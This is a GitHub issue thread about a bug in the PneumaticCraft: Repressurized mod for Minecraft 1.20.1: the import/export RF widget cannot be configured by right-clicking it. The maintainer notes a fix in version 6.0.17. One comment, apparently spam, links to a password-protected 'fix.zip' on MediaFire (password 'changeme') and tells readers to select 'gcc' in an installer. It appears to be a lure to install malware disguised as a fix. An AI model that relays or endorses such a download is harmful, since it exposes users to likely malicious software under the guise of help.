### ISSUE TITLE
1.20.1 Import/Export RF Issue

### ISSUE THREAD

**Issue by lanzal** [TeamPneumatic/pnc-repressurized#1339]
### Describe the bug

Unable to edit the config of import/export RF widget. The tooltip doesn't show "Right-click: widget options..." 

### How to reproduce the bug

Open Programmer, right-click import/export RF widget. 

### Expected behavior

When import/export RF widget is right clicked, it should show trying sides, preview area, and use count. 

### Which Minecraft version are you using?

1.20.1

### Which version of PneumaticCraft: Repressurized are you using?

pneumaticcraft-repressurized-6.0.15+mc1.20.1

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by desht** [comment]
Fixed in 6.0.17
